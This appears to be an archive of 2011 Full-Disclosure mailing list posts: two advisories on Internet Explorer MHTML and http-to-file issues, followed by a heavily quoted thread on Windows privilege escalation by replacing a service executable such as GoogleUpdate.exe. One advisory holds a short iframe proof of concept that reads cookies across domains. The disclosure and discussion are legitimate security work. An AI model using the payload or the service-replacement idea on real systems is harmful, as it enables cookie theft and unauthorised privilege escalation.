[Full-disclosure] MHTML Mime-Formatted Request Vulnerability Again
MHTML Mime-Formatted Request Vulnerability Again Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2011/09/23 Release: http://www.80vul.com/mhtml/mhtml-again.txt Overview: After MS11-057,I tested and found MHTML Mime-Formatted Request Vulnerability Occur again. test this codz on win2k3/vista+ie8 are the latest patch iframe src=mhtml:http://www.80vul.com/mhtml/zz.php!cookie;/iframe iframe src=http://www.80vul.com/mhtml/zz.php;/iframe We get this effect: http://www.80vul.com/mhtml/ie8new.png Disclosure Timeline: 2011/08/20 - Found this Vulnerability and Submit to Microsoft Security 2011/09/23 - A reply form MS, but no further follow-up ,So public References: [1] http://www.80vul.com/webzine_0x05/0x05%20IE%E4%B8%8BMHTML%E5%8D%8F%E8%AE%AE%E5%B8%A6%E6%9D%A5%E7%9A%84%E8%B7%A8%E5%9F%9F%E5%8D%B1%E5%AE%B3.html [2] http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt hitest ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Allowed From http:// To file:// In The Third-party Browser of IE
Allowed From http://; To file:// In The Third-party Browser of IE Author: www.80vul.com [Email:5up3rh3i#gmail.com] Release Date: 2011/09/23 Overview: After MS11-057,From From http://; To file:// is not allowed ,But it work as well In The Third-party Browser of IE Disclosure Timeline: 2011/08/20 - Found this Vulnerability and Submit to Microsoft Security 2011/09/23 - A reply form MS, but no further follow-up ,So public References: [1] http://www.80vul.com/webzine_0x05/0x06%20%E8%B5%B0%E5%90%91%E6%9C%AC%E5%9C%B0%E7%9A%84%E9%82%AA%E6%81%B6%E4%B9%8B%E8%B7%AF.html hitest ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation on Windows using Binary Planting
Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation on Windows using Binary Planting
Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | TravisBiehn.comhttp://www.travisbiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Good luck with that... you might want to look into msgina.dll , try replace that ;) have phun xd On 26 September 2011 10:29, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | TravisBiehn.comhttp://www.travisbiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.commailto:tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, mailto:kz2...@googlemail.comkz2...@googlemail.commailto:kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: mailto:full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk To: mailto:security-bas...@securityfocus.com security-bas...@securityfocus.commailto:security-bas...@securityfocus.com To: mailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitterhttps://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn | GitHubhttp://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.comhttp://TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.comsecurity-bas...@securityfocus.com To: full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.comsecurity-bas...@securityfocus.com To: full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
I havn't sent this email without doing a Proof of concept. It actually works with *Google Update Service*. The restricted user can replace GoogleUpdate.exe to execute malicious code. This service is installed by any of Google component such as Picasa, Google Talk etc. http://www.google.com/support/installer/bin/answer.py?answer=98805 Madhur On Monday, September 26, 2011, GloW - XD wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
Hrmm that sounds abit to good to be true :P id love to see what it involves...ie, the PoC.. and, i dont use googleupdate,so,why would this affect non chrome users.. i dunno.. still seems like not enough there to convince me yet, sorry. xd On 26 September 2011 11:18, Madhur Ahuja ahuja.mad...@gmail.com wrote: I havn't sent this email without doing a Proof of concept. It actually works with *Google Update Service*. The restricted user can replace GoogleUpdate.exe to execute malicious code. This service is installed by any of Google component such as Picasa, Google Talk etc. http://www.google.com/support/installer/bin/answer.py?answer=98805 Madhur On Monday, September 26, 2011, GloW - XD wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.commailto:tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD mailto:doo...@gmail.comdoo...@gmail.commailto:doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / http://crazycoders.com crazycoders.comhttp://crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) mailto:t...@hammerofgod.comt...@hammerofgod.commailto:t...@hammerofgod.com wrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn mailto:tbi...@gmail.comtbi...@gmail.commailto:tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, mailto:kz2...@googlemail.commailto:kz2...@googlemail.comkz2...@googlemail.commailto:kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: mailto:full-disclosure-boun...@lists.grok.org.uk mailto:full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk To: mailto:security-bas...@securityfocus.com mailto:security-bas...@securityfocus.com security-bas...@securityfocus.commailto:security-bas...@securityfocus.com To: mailto:full-disclosure@lists.grok.org.uk mailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
I agree. I am only talking of the scenario where this service is pre-installed. On Monday, September 26, 2011, Thor (Hammer of God) wrote: You'd have to be admin to install as a service, and the service would obviously need to then be running as local system to be of benefit (beyond what a normal user could do anyway) AND the installer would have to grant a normal user rights to overwrite it. Certainly possible, but the developer would have to go out of their way to screw that up. And if they did, it still wouldn't be because of the OS... T On Sep 25, 2011, at 6:18 PM, Travis Biehn tbi...@gmail.com wrote: GloW: there's a lot of 3rd party software that installs itself as windows services. -Travis On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD doo...@gmail.com wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter 